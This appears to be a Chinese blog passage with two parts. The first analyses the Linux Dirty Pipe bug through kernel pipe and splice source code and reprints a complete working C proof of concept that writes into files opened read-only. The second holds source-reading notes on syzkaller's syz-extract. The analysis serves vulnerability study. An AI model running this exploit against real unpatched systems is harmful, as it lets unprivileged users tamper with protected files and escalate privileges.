        // 如果 fd 设置了 O_DIRECT，则每次写入时都会占用新的一页，而不会合并
        if (is_packetized(filp)) 
            buf->flags = PIPE_BUF_FLAG_PACKET;
        else
            buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
        pipe->tmp_page = NULL;
        // 复制页数据
        copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
        if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
            if (!ret)
                ret = -EFAULT;
            break;
        }
        ret += copied;
        buf->offset = 0;
        buf->len = copied;

        if (!iov_iter_count(from))
            break;
    }

    if (!pipe_full(head, pipe->tail, pipe->max_usage))
        continue;

    /* Wait for buffer space to become available. */
    if (filp->f_flags & O_NONBLOCK) {
        if (!ret)
            ret = -EAGAIN;
        break;
    }
    if (signal_pending(current)) {
        if (!ret)
            ret = -ERESTARTSYS;
        break;
    }
    ...
}

这个 tmp_page 简单讲一下。如果该 pipe buf 所持有的 page 只有它自己持有，并且现在打算将其释放，那么 pipe buf 就私下不释放该 page，而是将其缓存起来供后续使用：

static void anon_pipe_buf_release(struct pipe_inode_info *pipe,
                  struct pipe_buffer *buf)
{
    struct page *page = buf->page;

    /*
     * If nobody else uses this page, and we don't already have a
     * temporary page, let's keep track of it as a one-deep
     * allocation cache. (Otherwise just release our reference to it)
     */
    if (page_count(page) == 1 && !pipe->tmp_page)
        pipe->tmp_page = page;
    else
        put_page(page);
}

从 pipe 读写操作中我们可以得知，pipe bufs 存放的页面无非两种：
直接引用其他不变页（例如文件缓存页），这样就无需进行数据复制操作
自己创建页，需要进行数据复制
由 pipe 机制来保证存放在 pipe bufs 中的页数据，不会被 pipe 本身给覆写。同时注意只有在自己创建的页上，才能进行 Merge 操作。

6. do_splice 函数

Linux 库函数 splice 的作用是，将某个 fd 的数据不经过用户层，直接拷贝进另一个 fd 中。其函数声明如下：

#define _GNU_SOURCE         /* See feature_test_macros(7) */
#include 

ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, size_t len, unsigned int flags);

这里的 fd 只能有两种情况：pipe fd 或 file fd，因此在 do_splice 函数中，内核也会对 fd 的类型做特判，来执行不同的数据传递操作。

这里，我们只需关注 From-fd 为 file，To-fd 为 pipe ，即数据从文件传递至管道的情况：

/*
 * Determine where to splice to/from.
 */
long do_splice(struct file *in, loff_t __user *off_in,
        struct file *out, loff_t __user *off_out,
        size_t len, unsigned int flags)
{
    struct pipe_inode_info *ipipe;
    struct pipe_inode_info *opipe;
    loff_t offset;
    long ret;

    ipipe = get_pipe_info(in);
    opipe = get_pipe_info(out);
    ...;
    
    // 当数据从文件复制给管道时
    if (opipe) {
        ...
        // 等待 pipe 存在空闲空间
        if (out->f_flags & O_NONBLOCK)
            flags |= SPLICE_F_NONBLOCK;

        pipe_lock(opipe);
        ret = wait_for_space(opipe, flags);
        // 如果等到 pipe 存在空闲空间后
        if (!ret) {
            unsigned int p_space;
             // 获取待传递数据大小
            /* Don't try to read more the pipe has space for. */
            p_space = opipe->max_usage - pipe_occupancy(opipe->head, opipe->tail);
            len = min_t(size_t, len, p_space << PAGE_SHIFT);
            // 执行真正的传递操作
            ret = do_splice_to(in, &offset, opipe, len, flags);
        }
        ...
        return ret;
    }

    ...
}

而在 do_splice_to 函数中，内核会根据文件系统类型，来调用对应的 splice_read 函数：

/*
 * Attempt to initiate a splice from a file to a pipe.
 */
static long do_splice_to(struct file *in, loff_t *ppos,
             struct pipe_inode_info *pipe, size_t len,
             unsigned int flags)
{
    int ret;

    if (unlikely(!(in->f_mode & FMODE_READ)))
        return -EBADF;

    ret = rw_verify_area(READ, in, ppos, len);
    if (unlikely(ret < 0))
        return ret;

    if (unlikely(len > MAX_RW_COUNT))
        len = MAX_RW_COUNT;
    // 调用 splice_read 函数
    if (in->f_op->splice_read)
        return in->f_op->splice_read(in, ppos, pipe, len, flags);
    return default_file_splice_read(in, ppos, pipe, len, flags);
}

以 linux 中最常见的文件系统 ext4 为例，这是 ext4 文件系统中所设置的一些关键方法：

// fs/ext4/file.c
const struct file_operations ext4_file_operations = {
    ...
    .read_iter    = ext4_file_read_iter,
    ...
    .splice_read  = generic_file_splice_read,
    ...
};

因此最终 do_splice_to 函数会调用到 generic_file_splice_read 函数来执行数据传递：

/**
 * generic_file_splice_read - splice data from file to a pipe
 * @in:      file to splice from
 * @ppos:    position in @in
 * @pipe:    pipe to splice to
 * @len:     number of bytes to splice
 * @flags:   splice modifier flags
 *
 * Description:
 *    Will read pages from given file and fill them into a pipe. Can be
 *    used as long as it has more or less sane ->read_iter().
 *
 */
ssize_t generic_file_splice_read(struct file *in, loff_t *ppos,
                 struct pipe_inode_info *pipe, size_t len,
                 unsigned int flags)
{
    struct iov_iter to;
    struct kiocb kiocb;
    unsigned int i_head;
    int ret;
    
    // 根据 pipe 结构体，创建 iov_iter 结构
    iov_iter_pipe(&to, READ, pipe, len);
    i_head = to.head;
    // 创建 kiocb 结构
    init_sync_kiocb(&kiocb, in);
    kiocb.ki_pos = *ppos;
    // 调用 call_read_iter 执行实际的数据传输操作 ！！！
    ret = call_read_iter(in, &kiocb, &to);
    // 如果数据正常传输
    if (ret > 0) {
        // 更新文件访问情况
        *ppos = kiocb.ki_pos;
        file_accessed(in);
    // 如果数据传输失败
    } else if (ret < 0) {
        to.head = i_head;
        to.iov_offset = 0;
        iov_iter_advance(&to, 0); /* to free what was emitted */
        /*
         * callers of ->splice_read() expect -EAGAIN on
         * "can't put anything in there", rather than -EFAULT.
         */
        if (ret == -EFAULT)
            ret = -EAGAIN;
    }

    return ret;
}

从 generic_file_splice_read 函数的代码中可以看到，该函数最终会调用 call_read_iter 函数来做数据传递；而该函数又会调用特定于文件系统的 read_iter 函数：

static inline ssize_t call_read_iter(struct file *file, struct kiocb *kio,
                     struct iov_iter *iter)
{
    return file->f_op->read_iter(kio, iter);
}

从 ext4_file_operations 代码中可以得知，call_read_iter 函数调用到的是 ext4_file_read_iter 函数：

static ssize_t ext4_file_read_iter(struct kiocb *iocb, struct iov_iter *to)
{
    struct inode *inode = file_inode(iocb->ki_filp);
    // 一些简单的判断
    if (unlikely(ext4_forced_shutdown(EXT4_SB(inode->i_sb))))
        return -EIO;

    if (!iov_iter_count(to))
        return 0; /* skip atime */

#ifdef CONFIG_FS_DAX
    if (IS_DAX(inode))
        return ext4_dax_read_iter(iocb, to);
#endif
    if (iocb->ki_flags & IOCB_DIRECT)
        return ext4_dio_read_iter(iocb, to);
    // 没设置 O_DIRECT 的走这里
    return generic_file_read_iter(iocb, to);
}

然后该函数又调 generic_file_read_iter：

/**
 * generic_file_read_iter - generic filesystem read routine
 * @iocb:    kernel I/O control block
 * @iter:    destination for the data read
 *
 * This is the "read_iter()" routine for all filesystems
 * that can use the page cache directly.
 * Return:
 * * number of bytes copied, even for partial reads
 * * negative error code if nothing was read
 */
ssize_t
generic_file_read_iter(struct kiocb *iocb, struct iov_iter *iter)
{
    size_t count = iov_iter_count(iter);
    ssize_t retval = 0;

    if (!count)
        goto out; /* skip atime */

    if (iocb->ki_flags & IOCB_DIRECT) {
        ...
    }
    // 继续调用
    retval = generic_file_buffered_read(iocb, iter, retval);
out:
    return retval;
}

接着又调 generic_file_buffered_read函数。该函数代码量太大了我就不贴了，只简单讲讲其大致功能：

尝试在该文件已有的文件缓存映射表中查找先前已经映射的文件缓存页
- 如果没文件缓存，则读取磁盘上的文件数据，创建新的文件缓存。
- 如果有文件缓存但是缓存过期了，则更新这个文件缓存
到了这一步，此时是一定有文件缓存了。则调用 copy_page_to_iter 函数来将文件缓存页上的数据，拷贝进 pipe 中。

这个函数正是我们先前所介绍过的，因此整个 splice 系统调用，就可以和 pipe 那里的未初始化漏洞串起来了。

四、漏洞成因

这个漏洞并非一蹴而就，而是由两个 commit 的错误相互结合导致的：

new iov_iter flavour: pipe-backed - linux commit 241699：引入字段的未初始化漏洞。 push_pipe 和 copy_page_to_iter_pipe 两个函数在设置 pipe_buffer 结构体时均未初始化 flag 字段。

pipe: merge anon_pipe_buf*_ops - linux commit f6dd97：在该 commit 前，内核通过比较 pipe_buf->ops 的地址来判断两块 pipe_buf 是否是可合并的。这种编码并不优雅，因为无论是否可合并，pipe_buf->ops 实际指向的几个函数指针都是同一个：

// fs/pipe.c
static const struct pipe_buf_operations anon_pipe_buf_ops = {
  .confirm = generic_pipe_buf_confirm,
  .release = anon_pipe_buf_release,
  .steal = anon_pipe_buf_steal,
  .get = generic_pipe_buf_get,
};

static const struct pipe_buf_operations anon_pipe_buf_nomerge_ops = {
  .confirm = generic_pipe_buf_confirm,
  .release = anon_pipe_buf_release,
  .steal = anon_pipe_buf_steal,
  .get = generic_pipe_buf_get,
};

static const struct pipe_buf_operations packet_pipe_buf_ops = {
  .confirm = generic_pipe_buf_confirm,
  .release = anon_pipe_buf_release,
  .steal = anon_pipe_buf_steal,
  .get = generic_pipe_buf_get,
};

可以看到，这么 tricky 的代码非常的不优雅，因此在该 commit(f6dd97) 中，linux 重构了这部分代码，启用了新的 pipe buf 标志：PIPE_BUF_FLAG_CAN_MERGE：

// include/linux/pipe_fs_i.h
#define PIPE_BUF_FLAG_LRU       0x01  /* page is on the LRU */
#define PIPE_BUF_FLAG_ATOMIC    0x02  /* was atomically mapped */
#define PIPE_BUF_FLAG_GIFT      0x04  /* page is a gift */
#define PIPE_BUF_FLAG_PACKET    0x08  /* read() as a packet */
#define PIPE_BUF_FLAG_CAN_MERGE 0x10  /* can merge buffers */     // <= 新引入的 flag

整个重构过程并没有问题，唯一带来的副作用就是引入了新的 pipe buf 标志：PIPE_BUF_FLAG_CAN_MERGE。

尽管第一个 commit 引入了字段未初始化漏洞，但该漏洞仍然无法造成较大的影响，因为可选的几个 pipe buf flag 中没有什么是可用于利用的。但是当第二个 commit 引入了新的 pipe buf flag：PIPE_BUF_FLAG_CAN_MERGE 时，该字段未初始化漏洞就非常的致命了，因为新的 pipe_buf 可以通过未初始化漏洞，来重用旧的 flag，例如 PIPE_BUF_FLAG_CAN_MERGE，来打破 page buf 的完整性，使得允许对那些本不该写入的页进行写入（例如本不该带有 PIPE_BUF_FLAG_CAN_MERGE 标志的页，诸如文件缓存页等等）。

注意，这里说的只读页，在 pipe 中并非使用权限控制等技术来保证不写，而是通过 pipe 所实现的逻辑来保证。因此，当 pipe 实现的逻辑出现了问题，那么 pipe 就可以尝试写入只读页，进而达到任意文件写的目的。

五、漏洞利用

通过上面的代码分析我们可以简单推断出这样的一条漏洞利用链：

创建管道（务必不要带上 O_DIRECT）
往管道中直接写入大量数据，使得 pipe 结构体中所有 page buf 的 flag 全部都设置了 PIPE_BUF_FLAG_CAN_MERGE 标志。
从该管道中将数据全部读取出来，释放所有 page buf。
调用 splice，将数据长度不与页大小对齐的可读文件数据，传递至该管道中。这样在管道的 head 位置，势必会有一个 page buf，其中 page 指向文件缓存，flags 为 PIPE_BUF_FLAG_CAN_MERGE。
因为 page buf 在重分配时不会初始化 flags，因此这里的 flags 将仍然保留为 PIPE_BUF_FLAG_CAN_MERGE。
直接继续往该管道中写入目标数据，这样由于 PIPE_BUF_FLAG_CAN_MERGE 标志仍然存在，新写入的数据将会直接与 page buf 所指向的文件缓存合并。
此时访问该文件，则内核会将被修改后的文件缓存中的数据返回，这样便可达到在内核层面任意文件写的目的。

需要注意的是，通过漏洞来“意外”修改文件缓存，不会使该文件缓存重新写回磁盘上。只有当内核的其他模块主动改写了这块文件缓存，使得该文件缓存变脏（dirty），这样才会把被修改后的文件缓存保存回磁盘上。
内核判断一个文件缓存是否 dirty，并非判断上面的数据有无被改写，而是判断其 dirty 标志。通过 dirty pipe 漏洞来改写文件缓存并不会影响到上面的 dirty 标志。

介于 cm4all 那边已经给出了非常清晰易懂的 POC，因此这里直接贴出它的 POC：

#include 
#include 
#include 
#include 
#include 
#include 
#include 

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

/**
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the
 * PIPE_BUF_FLAG_CAN_MERGE flag set.
 */
static void prepare_pipe(int p[2])
{
    if (pipe(p)) abort();

    const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
    static char buffer[4096];

    /* fill the pipe completely; each pipe_buffer will now have
       the PIPE_BUF_FLAG_CAN_MERGE flag */
    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
        write(p[1], buffer, n);
        r -= n;
    }

    /* drain the pipe, freeing all pipe_buffer instances (but
       leaving the flags initialized) */
    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
        read(p[0], buffer, n);
        r -= n;
    }

    /* the pipe is now empty, and if somebody adds a new
       pipe_buffer without initializing its "flags", the buffer
       will be mergeable */
}

int main(int argc, char **argv)
{
    if (argc != 4) {
        fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
        return EXIT_FAILURE;
    }

    /* dumb command-line argument parser */
    const char *const path = argv[1];
    loff_t offset = strtoul(argv[2], NULL, 0);
    const char *const data = argv[3];
    const size_t data_size = strlen(data);

    if (offset % PAGE_SIZE == 0) {
        fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
        return EXIT_FAILURE;
    }

    const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
    const loff_t end_offset = offset + (loff_t)data_size;
    if (end_offset > next_page) {
        fprintf(stderr, "Sorry, cannot write across a page boundary\n");
        return EXIT_FAILURE;
    }

    /* open the input file and validate the specified offset */
    const int fd = open(path, O_RDONLY); // yes, read-only! :-)
    if (fd < 0) {
        perror("open failed");
        return EXIT_FAILURE;
    }

    struct stat st;
    if (fstat(fd, &st)) {
        perror("stat failed");
        return EXIT_FAILURE;
    }

    if (offset > st.st_size) {
        fprintf(stderr, "Offset is not inside the file\n");
        return EXIT_FAILURE;
    }

    if (end_offset > st.st_size) {
        fprintf(stderr, "Sorry, cannot enlarge the file\n");
        return EXIT_FAILURE;
    }

    /* create the pipe with all flags initialized with
       PIPE_BUF_FLAG_CAN_MERGE */
    int p[2];
    prepare_pipe(p);

    /* splice one byte from before the specified offset into the
       pipe; this will add a reference to the page cache, but
       since copy_page_to_iter_pipe() does not initialize the
       "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
    --offset;
    ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
    if (nbytes < 0) {
        perror("splice failed");
        return EXIT_FAILURE;
    }
    if (nbytes == 0) {
        fprintf(stderr, "short splice\n");
        return EXIT_FAILURE;
    }

    /* the following write will not create a new pipe_buffer, but
       will instead write into the page cache, because of the
       PIPE_BUF_FLAG_CAN_MERGE flag */
    nbytes = write(p[1], data, data_size);
    if (nbytes < 0) {
        perror("write failed");
        return EXIT_FAILURE;
    }
    if ((size_t)nbytes < data_size) {
        fprintf(stderr, "short write\n");
        return EXIT_FAILURE;
    }

    printf("It worked!\n");
    return EXIT_SUCCESS;
}

运行结果如下：

可以看到运行的非常顺利，成功在只读打开该文件的情况下，完成对该文件的写入。

七、参考

syzkaller 源码阅读笔记-1

2022-03-14T16:00:00.000Z

一、简介

syzkaller 是 google 开源的一款无监督覆盖率引导的 kernel fuzzer，支持包括 Linux、Windows 等操作系统的测试。

syzkaller 有很多个部件。其中：

syz-extract：用于解析 syzlang 中的常量
syz-sysgen：用于解析 syzlang，提取其中描述的 syscall 和参数类型，以及参数依赖关系
syz-manager：用于启动与管理 syzkaller
syz-fuzzer：实际在 VM 中运行的 fuzzer
syz-executor：实际在 VM 中运行的测试程序

架构图如下：

在本文中，我将先介绍 syz-extract 和 syz-sysgen 的源码。

在本系列源码阅读笔记中，所有涉及到的 arch 和 platform 均为 x86_64 linux，不再另行说明。
syzkaller git checkout： 3a9d0024ba818c5b37058d9ac6fdfc0ddfa78be6
checkout Date: Fri Nov 19 13:06:38 2021 +0100

二、syz-extract

用途：解析并获取 syzlang 文件中的常量所对应的具体整型，并将结果存放至 xxx.txt.const 文件中。

1. main

syz-extract main 函数位于 sys/syz-extract/extract.go 中。

首先，syz-extract 将会尝试解析传入的参数：

// Kiprey: in Function `main` 
flag.Parse()
if *flagBuild && *flagBuildDir != "" {
    tool.Failf("-build and -builddir is an invalid combination")
}

其参数列表如下：

var (
    flagOS        = flag.String("os", runtime.GOOS, "target OS")
    flagBuild     = flag.Bool("build", false, "regenerate arch-specific kernel headers")
    flagSourceDir = flag.String("sourcedir", "", "path to kernel source checkout dir")
    flagIncludes  = flag.String("includedirs", "", "path to other kernel source include dirs separated by commas")
    flagBuildDir  = flag.String("builddir", "", "path to kernel build dir")
    flagArch      = flag.String("arch", "", "comma-separated list of arches to generate (all by default)")
)

之后是调用 archFileList 函数，解析传入的参数，并生成对应的返回值。

其中
OS 为操作系统字符串
archArray 为待生成的 arch 字符串数组
files 为待分析的 syzlang 文件名 字符串数组

// Kiprey: in Function `main` 
OS, archArray, files, err := archFileList(*flagOS, *flagArch, flag.Args())
if err != nil {
    tool.Fail(err)
}

接下来，便是尝试获取 OS 所对应的 Extractor 结构体；如果 OS 不存在则肯定取不到，直接报错：

// Kiprey: in Function `main` 
extractor := extractors[OS]
if extractor == nil {
    tool.Failf("unknown os: %v", OS)
}

extractors 数组如下所示，该数组为不同的 OS 实例化了不同的 Extractor 类。其中 linux OS 所对应的 Extractor 实例（即那三个函数的实现）位于 sys/syz-extract/linux.go 中：

三个函数的实现我们稍后再看。

type Extractor interface {
    prepare(sourcedir string, build bool, arches []*Arch) error
    prepareArch(arch *Arch) error
    processFile(arch *Arch, info *compiler.ConstInfo) (map[string]uint64, map[string]bool, error)
}

var extractors = map[string]Extractor{
    targets.Akaros:  new(akaros),
    targets.Linux:   new(linux), // sys/syz-extract/linux.go
    targets.FreeBSD: new(freebsd),
    targets.Darwin:  new(darwin),
    targets.NetBSD:  new(netbsd),
    targets.OpenBSD: new(openbsd),
    "android":       new(linux),
    targets.Fuchsia: new(fuchsia),
    targets.Windows: new(windows),
    targets.Trusty:  new(trusty),
}

回到 main 函数，syz-extract 要用已有的 OS 字符串、archArray 字符串数组，以及 syzlang 文件名数组来生成出对应的 arches 结构体数组：

// Kiprey: in function `main`
arches, err := createArches(OS, archArray, files)
if err != nil {
    tool.Fail(err)
}
if *flagSourceDir == "" {
    tool.Fail(fmt.Errorf("provide path to kernel checkout via -sourcedir " +
                         "flag (or make extract SOURCEDIR)"))
}

准备工作已经做的差不多了，接下来让 extractor 执行初始化操作：

// Kiprey: in function main
if err := extractor.prepare(*flagSourceDir, *flagBuild, arches); err != nil {
    tool.Fail(err)
}

这一步实际上会调用到 sys/syz-extract/linux.go 中的 prepare 函数：

// Kiprey: in sys/syz-extract/linux.go
func (*linux) prepare(sourcedir string, build bool, arches []*Arch) error {
    if build {
        // Run 'make mrproper', otherwise out-of-tree build fails.
        // However, it takes unreasonable amount of time,
        // so first check few files and if they are missing hope for best.
        for _, a := range arches {
            arch := a.target.KernelArch
            if osutil.IsExist(filepath.Join(sourcedir, ".config")) ||
                osutil.IsExist(filepath.Join(sourcedir, "init/main.o")) ||
                osutil.IsExist(filepath.Join(sourcedir, "include/config")) ||
                osutil.IsExist(filepath.Join(sourcedir, "include/generated/compile.h")) ||
                osutil.IsExist(filepath.Join(sourcedir, "arch", arch, "include", "generated")) {
                fmt.Printf("make mrproper ARCH=%v\n", arch)
                out, err := osutil.RunCmd(time.Hour, sourcedir, "make", "mrproper", "ARCH="+arch,
                    "-j", fmt.Sprint(runtime.NumCPU()))
                if err != nil {
                    return fmt.Errorf("make mrproper failed: %v\n%s", err, out)
                }
            }
        }
    } else {
        if len(arches) > 1 {
            return fmt.Errorf("more than 1 arch is invalid without -build")
        }
    }
    return nil
}

如果不指定重新生成 linux kernel header，那么只会做一些简单的检查。但如果指定重新生成了，则会尝试在 linux kernel src 上执行 make mrproper。

回到 main 函数，接下来便是创建 go routine 通信管道和启动并行 worker：

go routine 是 go 的轻量级线程，其中关键字 go 后面的语句将被放进新的 go routine 中执行。

jobC := make(chan interface{}, len(archArray)*len(files))
// 将 arch 结构体放置进 jobC 管道中
for _, arch := range arches {
    jobC <- arch
}

for p := 0; p < runtime.GOMAXPROCS(0); p++ {
    go worker(extractor, jobC)
}

worker 启动后，main 函数就需要等待 worker 处理完成后才能保存处理结果至文件中，这就涉及到了线程协同。注意到代码中有 <-arch.done 和 <-f.done 语句，这两个语句会一直阻塞等待管道，直到其传来信息。若 worker 函数中对管道执行 close 操作，则被关闭的管道将不再等待，继续向下执行。因此这里 syz-extract 就利用了管道来完成线程协同。

// Kiprey: in function `main`
constFiles := make(map[string]*compiler.ConstFile)
for _, file := range files {
    constFiles[file] = compiler.NewConstFile()
}
for _, arch := range arches {
    fmt.Printf("generating %v/%v...\n", arch.target.OS, arch.target.Arch)
    <-arch.done
    if arch.err != nil {
        failed = true
        fmt.Printf("%v\n", arch.err)
        continue
    }
    for _, f := range arch.files {
        <-f.done
        if f.err != nil {
            failed = true
            fmt.Printf("%v: %v\n", f.name, f.err)
            continue
        }
        constFiles[f.name].AddArch(f.arch.target.Arch, f.consts, f.undeclared)
    }
}

后面的代码内容便是将生成结果保存进 .const 文件中，没有其他有意思的东西了：

// Kiprey: in function `main`
for file, cf := range constFiles {
    outname := filepath.Join("sys", OS, file+".const")
    data := cf.Serialize()
    if len(data) == 0 {
        os.Remove(outname)
        continue
    }
    if err := osutil.WriteFile(outname, data); err != nil {
        tool.Failf("failed to write output file: %v", err)
    }
}

if !failed && *flagArch == "" {
    failed = checkUnsupportedCalls(arches)
}
for _, arch := range arches {
    if arch.build {
        os.RemoveAll(arch.buildDir)
    }
}
if failed {
    os.Exit(1)
}

2. archFileList

archFileList 函数用于解析传入的参数信息，代码量非常短。

首先，调用者需要将 OS 字符串、arch 字符串，以及存放 syzlang 文件路径的字符串数组传入该函数：

1 2	func archFileList(os, arch string, files []string) (string, []string, []string, error)

之后，archFileList 会对 android 设置一些特殊的字段，然后切割参数字符串 arch，并将切割后的结果全保存进字符串数组 arches 中。若没有指定 arches 参数，则添加全部的 arch 进 arches 数组中。

// Kiprey: in archFileList Function
// Note: this is linux-specific and should be part of Extractor and moved to linux.go.
android := false
if os == "android" {
    android = true
    os = targets.Linux
}
var arches []string
if arch != "" {
    arches = strings.Split(arch, ",")
} else {
    for arch := range targets.List[os] {
        arches = append(arches, arch)
    }
    if android {
        arches = []string{targets.I386, targets.AMD64, targets.ARM, targets.ARM64}
    }
    sort.Strings(arches)
}

其中，targets.List 是一个 map 映射（即 sys/targets/targets.go 中的 List 变量），这上面存放了很多关于不同 OS 以及这些 OS 在特定 arch 下的信息，以下是一个精简后的代码片段：

// nolint: lll
var List = map[string]map[string]*Target{
    ...,
    Linux: {
        AMD64: {
            PtrSize:          8,
            PageSize:         4 << 10,
            LittleEndian:     true,
            CFlags:           []string{"-m64"},
            Triple:           "x86_64-linux-gnu",
            KernelArch:       "x86_64",
            KernelHeaderArch: "x86",
            NeedSyscallDefine: func(nr uint64) bool {
                // Only generate defines for new syscalls
                // (added after commit 8a1ab3155c2ac on 2012-10-04).
                return nr >= 313
            },
        },
        I386: {
            VMArch:           AMD64,
            PtrSize:          4,
            PageSize:         4 << 10,
            Int64Alignment:   4,
            LittleEndian:     true,
            CFlags:           []string{"-m32"},
            Triple:           "x86_64-linux-gnu",
            KernelArch:       "i386",
            KernelHeaderArch: "x86",
        },
        ...
    },
    ...
}

不过在 for arch := range targets.List[os] 的过程中，只会取出这些 map 的 key 值，即一系列的架构字符串，因此最后 archs 数据中存放的值如下：

接下来我们回到函数 archFileList 中：

// Kiprey: in archFileList Function
if len(files) == 0 {
        matches, err := filepath.Glob(filepath.Join("sys", os, "*.txt"))
        if err != nil || len(matches) == 0 {
            return "", nil, nil, fmt.Errorf("failed to find sys files: %v", err)
        }
        manualFiles := map[string]bool{
            // Not upstream, generated on https://github.com/multipath-tcp/mptcp_net-next
            "vnet_mptcp.txt": true,
            // Was in linux-next, but then was removed, fate is unknown.
            "dev_watch_queue.txt": true,
            // Not upstream, generated on:
            // https://chromium.googlesource.com/chromiumos/third_party/kernel d2a8a1eb8b86
            "dev_bifrost.txt": true,
            // ION support was removed from kernel.
            // We plan to leave the descriptions for some time as is and later remove them.
            "dev_ion.txt": true,
            // Not upstream, generated on unknown tree.
            "dev_img_rogue.txt": true,
        }
        androidFiles := map[string]bool{
            "dev_tlk_device.txt": true,
            // This was generated on:
            // https://source.codeaurora.org/quic/la/kernel/msm-4.9 msm-4.9
            "dev_video4linux.txt": true,
            // This was generated on:
            // https://chromium.googlesource.com/chromiumos/third_party/kernel 3a36438201f3
            "fs_incfs.txt": true,
        }
        for _, f := range matches {
            f = filepath.Base(f)
            if manualFiles[f] || os == targets.Linux && android != androidFiles[f] {
                continue
            }
            files = append(files, f)
        }
        sort.Strings(files)
    }

若传入的参数 files 为空，则 syz-extract 将尝试自动添加文件进入。在这一部分代码中：

matches, err := filepath.Glob(filepath.Join("sys", os, "*.txt"))
if err != nil || len(matches) == 0 {
    return "", nil, nil, fmt.Errorf("failed to find sys files: %v", err)
}

syz-extract 将尝试解析路径 sys/linux/*.txt 路径，并将解析结果存放进 matches 数组中：

之后，在下面的代码中，跳过人工添加的文件，以及 android 不允许添加的文件（androidFiles 映射中 value 为 false 的条目），最后为结果数组做个顺序排序：

// Kiprey: in archFileList Function
for _, f := range matches {
    f = filepath.Base(f)
    if manualFiles[f] || os == targets.Linux && android != androidFiles[f] {
        continue
    }
    files = append(files, f)
}
sort.Strings(files)

函数结束，结果返回：

1 2	// Kiprey: in archFileList Function return os, arches, files, nil

3. createArches

该函数用于生成与参数对应的 Arch 结构体数组。该函数内容较少，因此笔记以注释形式内嵌在函数中：

func createArches(OS string, archArray, files []string) ([]*Arch, error) {
    var arches []*Arch
    // 遍历 archArray 结构体
    for _, archStr := range archArray {
        // 尝试确定 buid 文件夹路径
        buildDir := ""
        if *flagBuild {
            dir, err := ioutil.TempDir("", "syzkaller-kernel-build")
            if err != nil {
                return nil, fmt.Errorf("failed to create temp dir: %v", err)
            }
            buildDir = dir
        } else if *flagBuildDir != "" {
            buildDir = *flagBuildDir
        } else {
            buildDir = *flagSourceDir
        }
        // 获取 targets.List 中对应与 OS 和 arch 的 `Target` 结构体
        target := targets.Get(OS, archStr)
        if target == nil {
            return nil, fmt.Errorf("unknown arch: %v", archStr)
        }
        // 创建 arch 结构体
        arch := &Arch{
            // 存放特定 OS 特定 arch 的一些信息
            target:      target,
            // kernel source 路径
            sourceDir:   *flagSourceDir,
            // kernel source header 路径
            includeDirs: *flagIncludes,
            // build 路径
            buildDir:    buildDir,
            // bool 值，是否需要重新生成架构指定的 kernel header
            build:       *flagBuild,
            // 管道，用于 go routine 间通信。当 arch 分析完成后，将会向该管道通知
            done:        make(chan bool),
        }
        // 将 syzlang 文件名数组添加进 arch 结构体中
        for _, f := range files {
            arch.files = append(arch.files, &File{
                arch: arch,
                name: f,
                // 管道，用于 go routine 间通信。当 file 分析完成后，将会向该管道通知
                done: make(chan bool),
            })
        }
        // 将新创建的 arch 结构体放置进 arches 数组中
        arches = append(arches, arch)
    }
    return arches, nil
}

4. worker

worker 用于执行真正的解析变量工作：

1	func worker(extractor Extractor, jobC chan interface{})

对于管道 jobC 中的元素来说，初始时在 main 函数放进去的肯定是 Arch 结构体：

因此初始时 worker 内部的 switch 将检测到传入的变量类型为 Arch 结构：

// Kiprey: in function `worker`
for job := range jobC {
    // 为 j 赋值为 jobC 管道中的对象，初始时为 Arch
    switch j := job.(type) {
        // 最开始的时候肯定会走入这个分支
        case *Arch:
            // 执行 processArch，生成 const 信息
            infos, err := processArch(extractor, j)
            j.err = err
            close(j.done)
            if j.err == nil {
                for _, f := range j.files {
                    f.info = infos[filepath.Join("sys", j.target.OS, f.name)]
                    jobC <- f
                }
            }
        case *File:
            j.consts, j.undeclared, j.err = processFile(extractor, j.arch, j)
            close(j.done)
    }
}

注意到变量 j 就是从 jobC 中取出来的 Arch 结构体，因此在 processArch 操作完成后，worker 函数会分别从 infos 映射中遍历取出对应文件的信息，并将其填充至 arch 结构体中 files 结构体数组内的各个元素字段里：

最后执行 jobC <- f 操作，将这个 File 结构体放入 jobC 管道中。

由于 worker 函数是会循环读取 jobC 内数据，因此 worker 函数接下来便会取出刚刚新放入的 File 结构体，执行 processFile 函数。在 processFile 中，syz-extract 将会获取各个 const 变量（例如 O_RDWR）所对应的整型值(例如2)。

worker 函数中还有一个关键点需要注意，当 processXXX 函数执行完成后，worker 函数接下来都会执行 close(j.done) ，将通信管道关闭。这样做的目的是为了通知 main goroutine “某部分工作已经完成”。这个操作有点类似于使用信号量来保证线程同步。

5. processArch

processArch 的作用是，处理传入的 Extractor 和 Arch 结构体，生成 const 信息。

func processArch(extractor Extractor, arch *Arch) (map[string]*compiler.ConstInfo, error) {
    errBuf := new(bytes.Buffer)
    // 定义 error handler 函数
    eh := func(pos ast.Pos, msg string) {
        fmt.Fprintf(errBuf, "%v: %v\n", pos, msg)
    }
    // 解析 sys/linux/*.txt 的 syzlang 文件，形成一个 AST 数组
    // 因此 top 变量就是 ast 森林的根节点
    top := ast.ParseGlob(filepath.Join("sys", arch.target.OS, "*.txt"), eh)
    if top == nil {
        return nil, fmt.Errorf("%v", errBuf.String())
    }
    // 调用 compiler.ExtractConsts 获取每个 syzlang 文件中所对应的 const 信息
    infos := compiler.ExtractConsts(top, arch.target, eh)
    if infos == nil {
        return nil, fmt.Errorf("%v", errBuf.String())
    }
    // 让 Extractor 为 arch 做些准备
    if err := extractor.prepareArch(arch); err != nil {
        return nil, err
    }
    return infos, nil
}

其中，compiler.ExtractConsts 只是一个简单的 wrapper 函数，获取编译 syzlang 结果中的 fileConsts 字段：

